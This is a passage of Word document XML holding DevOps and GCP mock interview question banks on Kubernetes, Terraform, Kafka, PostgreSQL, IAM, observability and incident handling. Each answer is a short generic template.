        <w:t>A: A strong answer should directly address the Secrets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implement secrets management with HashiCorp Vault or cloud secret managers for applications running in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Compare Deployment, StatefulSet, and DaemonSet. When would you use each in an enterprise platform?</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Compare Deployment, StatefulSet, and DaemonSet. When would you use each in an enterprise platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you use Splunk, AppDynamics, and xMatters to monitor services, reduce alert noise, and proactively prevent outages?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use Splunk, AppDynamics, and xMatters to monitor services, reduce alert noise, and proactively prevent outages?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. What SQL or database troubleshooting experience do you have with PostgreSQL or MSSQL, especially for connectivity, slow queries, or locks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SQL/Database Operations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the SQL/Database Operations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SQL or database troubleshooting experience do you have with PostgreSQL or MSSQL, especially for connectivity, slow queries, or locks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. A service in GKE cannot connect to a database or third-party endpoint. How would you troubleshoot DNS, routes, firewalls, security groups, and application configuration?</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service in GKE cannot connect to a database or third-party endpoint. How would you troubleshoot DNS, routes, firewalls, security groups, and application configuration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. What security controls would you add across CI/CD, containers, Kubernetes, cloud IAM, secrets, logging, and audit trails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DevSecOps/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the DevSecOps/Security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security controls would you add across CI/CD, containers, Kubernetes, cloud IAM, secrets, logging, and audit trails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Tell me about a time you automated a manual operations task or improved a workflow. What was the impact, and how did you share the learning with the team?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Behavioral/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Behavioral/Automation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time you automated a manual operations task or improved a workflow. What was the impact, and how did you share the learning with the team?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 61 - Resilinc GCP Production Incident Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Starting point, staying on GCP support when a production issue hits networking, storage, or security. What is your usual step-by-step approach to isolate whether it is a platform problem, an application problem, or something in IAM or VPC configuration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Support</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP Support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Starting point, staying on GCP support when a production issue hits networking, storage, or security. What is your usual step-by-step approach to isolate whether it is a platform problem, an application problem, or something in IAM or VPC configuration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What alerts or dashboards have you personally built or tuned?</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alerts or dashboards have you personally built or tuned?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Can you walk me through one case where the alert fired but the real issue was something different from what the metric suggested?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Incident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Incident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walk me through one case where the alert fired but the real issue was something different from what the metric suggested?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Walk me through a production Kubernetes issue you handled where a pod or deployment was failing. Tell me exactly how you diagnosed it from the first symptom to the fix.</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a production Kubernetes issue you handled where a pod or deployment was failing. Tell me exactly how you diagnosed it from the first symptom to the fix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What have you actually built with Terraform in GCP? Can you walk me through a real module or stack you owned end-to-end?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/GCP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have you actually built with Terraform in GCP? Can you walk me through a real module or stack you owned end-to-end?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. In a GCP environment, how have you designed IAM or VPC security so that teams could move fast without opening things up too much? What trade-off did you have to make?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IAM/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the IAM/Security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a GCP environment, how have you designed IAM or VPC security so that teams could move fast without opening things up too much? What trade-off did you have to make?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Tell me about a production outage you worked on. What was the root cause? What did you change afterward to prevent it from happening again?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Production Outage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Production Outage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production outage you worked on. What was the root cause? What did you change afterward to prevent it from happening again?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Pick one actual incident you handled in GCP. Walk me through the exact failure, how you found the root cause, and what the post-incident change was.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Incident/RCA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP Incident/RCA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Pick one actual incident you handled in GCP. Walk me through the exact failure, how you found the root cause, and what the post-incident change was.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How would you troubleshoot Kubernetes networking issues involving CNI, Services, and Ingress?</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Kubernetes networking issues involving CNI, Services, and Ingress?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Explain Docker internals that matter during production troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker Internals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker Internals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Docker internals that matter during production troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How would you troubleshoot Kafka producer, broker, consumer lag, and consumer group issues?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kafka Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kafka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Kafka producer, broker, consumer lag, and consumer group issues?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you design and troubleshoot PostgreSQL high availability and backup/restore?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PostgreSQL HA/Backup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the PostgreSQL HA/Backup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and troubleshoot PostgreSQL high availability and backup/restore?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How would you troubleshoot GitHub Actions or CI/CD pipeline failures in production delivery?</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GitHub Actions or CI/CD pipeline failures in production delivery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. What Grafana and Prometheus dashboards would you build for production support?</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Grafana and Prometheus dashboards would you build for production support?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. How do you manage Terraform state, modules, locking, drift, and safe production changes?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Terraform state, modules, locking, drift, and safe production changes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Explain how you have used GKE, IAM, VPC, Cloud SQL, and Load Balancer in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP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how you have used GKE, IAM, VPC, Cloud SQL, and Load Balancer in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. How do you troubleshoot Linux CPU, memory, disk, network, and process issues during an incident?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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Linux CPU, memory, disk, network, and process issues during an incident?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. How do you handle production incidents and write an RCA?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Incident Handling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production incidents and write an RCA?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. Design scalable cloud infrastructure for a production application on GCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the System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scalable cloud infrastructure for a production application on GCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 62 - Complete DevOps GCP Kubernetes Screening Bank</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Walk me through your current role at Capgemini.</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your current role at Capgemini.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What does your day-to-day work look like?</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your day-to-day work look like?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What are your major responsibilities?</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major responsibilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Which project are you currently working on?</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project are you currently working on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Why are you looking for a change?</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are you looking for a change?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Why do you want to join our company?</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you want to join our company?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Roughly how much of your week would you say was actually spent working in GCP rather than adjacent tools or other clouds?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Roughly how much of your week would you say was actually spent working in GCP rather than adjacent tools or other clouds?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Go through the core GCP areas one by one.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Go through the core GCP areas one by one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. On Compute Engine, what kinds of production issues have you personally handled?</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On Compute Engine, what kinds of production issues have you personally handled?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What was the hardest Compute Engine issue you troubleshot end-to-end?</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hardest Compute Engine issue you troubleshot end-to-end?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Which GCP services have you used in production?</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have you used in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Explain VPC in GCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud &amp; GCP</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Q13. Explain IAM roles and service accounts.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IAM roles and service accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How do you secure workloads in GCP?</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workloads in GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Explain Cloud Storage classes.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Cloud Storage classes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. What is Cloud SQL?</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Cloud SQL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. Have you worked with GKE?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GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. Explain GKE architecture.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GKE architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. What is the difference between GKE Autopilot and Standard?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Cloud &amp; GCP</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. How do you troubleshoot a GKE cluster?</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GKE cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. Explain Kubernetes architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes</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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. What are Pods?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Pods?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. What is the difference between Deployment, StatefulSet, and DaemonSet?</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Deployment, StatefulSet, and DaemonSet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. What is a ReplicaSet?</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ReplicaSet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. Explain Services in Kubernetes.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Services in Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. Explain FQDN in Kubernetes.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FQDN in Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. How does pod-to-pod communication work?</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pod-to-pod communication work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. What are liveness and readiness probes?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liveness and readiness probes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. What happens if a liveness probe fails?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liveness probe fails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q30. What happens if a readiness probe fails?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readiness probe fails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q31. Explain ConfigMaps and Secrets.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ConfigMaps and Secrets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q32. What are Persistent Volumes and PVCs?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Persistent Volumes and PVCs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
